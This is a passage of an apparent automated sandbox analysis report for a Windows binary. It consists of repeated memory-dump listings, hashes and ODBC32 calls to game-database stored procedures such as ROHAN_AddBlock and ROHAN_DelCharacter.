                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_ConsignUnregistItem] (?,?)}
                                                                                      • API String ID: 0-701866484
                                                                                      • Opcode ID: cb09bc780090d4ca337e46ff4a27ea4c8a7dfbca76ec29572fa6bdcf1e253c7f
                                                                                      • Instruction ID: 1c0449da600a8c69dc7d245723ef59ad2075d2adb26c2e4aac11e1d665ddc6c3
                                                                                      • Opcode Fuzzy Hash: cb09bc780090d4ca337e46ff4a27ea4c8a7dfbca76ec29572fa6bdcf1e253c7f
                                                                                      • Instruction Fuzzy Hash: CA21FFB0E48318ABFB649F44CC42F997375EB84714F108189F71C6A2C0D6B97A80DF59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_RemoveFriend] (?,?)},000000FD), ref: 00432653
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00432692
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 004326C7
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004326FF
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_RemoveFriend] (?,?)}, xrefs: 0043264A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_RemoveFriend] (?,?)}
                                                                                      • API String ID: 0-4163439245
                                                                                      • Opcode ID: 03648da460d34cf59bd16445d08fe2a8f445aec4ca6272b66cb29876cabe5d86
                                                                                      • Instruction ID: 849affcfa7f35926e93327f17b24a35a494651ba9d8e58dda039607b82e664da
                                                                                      • Opcode Fuzzy Hash: 03648da460d34cf59bd16445d08fe2a8f445aec4ca6272b66cb29876cabe5d86
                                                                                      • Instruction Fuzzy Hash: 2021EDB4A4521CAFFB24CF44CC52FAA7374EB84B14F108289F7186B2C6D6B579408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelNGuildMember] (?,?) } ,000000FD), ref: 004256E3
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00425722
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425757
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042578F
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelNGuildMember] (?,?) } , xrefs: 004256DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelNGuildMember] (?,?) }
                                                                                      • API String ID: 0-907349996
                                                                                      • Opcode ID: ce8e569c5683d2a3190c459b6ad56fc7654ab763420f25e9bc356eef50ed5459
                                                                                      • Instruction ID: a89cf86553cac1b60b69b786027718c04c550c4f50add10539911f3346664f29
                                                                                      • Opcode Fuzzy Hash: ce8e569c5683d2a3190c459b6ad56fc7654ab763420f25e9bc356eef50ed5459
                                                                                      • Instruction Fuzzy Hash: 6E2124B0684218ABFB60CF64CC46FDA7374EB44B14F608289F71C6E2C4D6B16D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_AddBlock] (?,?)},000000FD), ref: 004327DC
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043281B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00432850
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432888
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_AddBlock] (?,?)}, xrefs: 004327D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_AddBlock] (?,?)}
                                                                                      • API String ID: 0-2554191235
                                                                                      • Opcode ID: b77b16bcbd88cd323f98291cb56693138cf2bd1f3ffd9d6793eb3108f02d8bbc
                                                                                      • Instruction ID: d973408020a910beba663a5201bc7745a6ac8ed0c215cf25a4d92be7cdc524ec
                                                                                      • Opcode Fuzzy Hash: b77b16bcbd88cd323f98291cb56693138cf2bd1f3ffd9d6793eb3108f02d8bbc
                                                                                      • Instruction Fuzzy Hash: 5421F4B1645218BBFB24CF54CC52FAA7374EB88714F104289F6146E2C6D6B5AD408F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_RemoveBlock] (?,?)},000000FD), ref: 004328BB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004328FA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043292F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00432967
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_RemoveBlock] (?,?)}, xrefs: 004328B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_RemoveBlock] (?,?)}
                                                                                      • API String ID: 0-3416181401
                                                                                      • Opcode ID: 0bc4abba7e81e77f6b283709453c35c59c5142b22c882716310a586213b4f2c0
                                                                                      • Instruction ID: 9c85ae958ee67050bf6495e597a7b0a53e65e6d8dd400fb0ba99840f87a114cf
                                                                                      • Opcode Fuzzy Hash: 0bc4abba7e81e77f6b283709453c35c59c5142b22c882716310a586213b4f2c0
                                                                                      • Instruction Fuzzy Hash: 9E21F1B1A42218ABFB24DF44CD52FAA7374EB84B14F114289F7186E2C6D6B57E40CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_DelCharacter](?,?)} ,000000FD), ref: 0042BA0B
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042BA4A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042BA7F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042BAB7
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_DelCharacter](?,?)} , xrefs: 0042BA02
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_DelCharacter](?,?)}
                                                                                      • API String ID: 0-1231830193
                                                                                      • Opcode ID: d06547db097b4bc8fd755d86dbf51e298dbd6635105fd9fee58b2eeaa7001c71
                                                                                      • Instruction ID: 48268bd4b592b2da4192612ecd570bbef656d36126d9fac246f282c860a29b49
                                                                                      • Opcode Fuzzy Hash: d06547db097b4bc8fd755d86dbf51e298dbd6635105fd9fee58b2eeaa7001c71
                                                                                      • Instruction Fuzzy Hash: 0921EDF5A40218ABEB24CF44CD52FAA7378EB84B18F108289F7187B2C5D6B569418B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_CreateNGuild] (?,?) } ,000000FD), ref: 004259B9
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004259F8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425A2D
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000011,00000000,?,00000012,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425A65
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_CreateNGuild] (?,?) } , xrefs: 004259B0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_CreateNGuild] (?,?) }
                                                                                      • API String ID: 0-1631241501
                                                                                      • Opcode ID: a56664f8205b5e5d0a4ecb688425938a96044e0a5de63c8fb684ecc9688c0e06
                                                                                      • Instruction ID: 9fbf6613b716ef8daa2e08ce78a83b7e337d0f0f474b3ddc4db0afcf15a9c01e
                                                                                      • Opcode Fuzzy Hash: a56664f8205b5e5d0a4ecb688425938a96044e0a5de63c8fb684ecc9688c0e06
                                                                                      • Instruction Fuzzy Hash: 552100B4A40218ABEB64CF44CC62FEA7374EB85B18F108189F71C6F2C5D6B56D808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignAddMoney] (?,?)},000000FD), ref: 004309E7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00430A26
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430A5B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00430A93
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignAddMoney] (?,?)}, xrefs: 004309DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
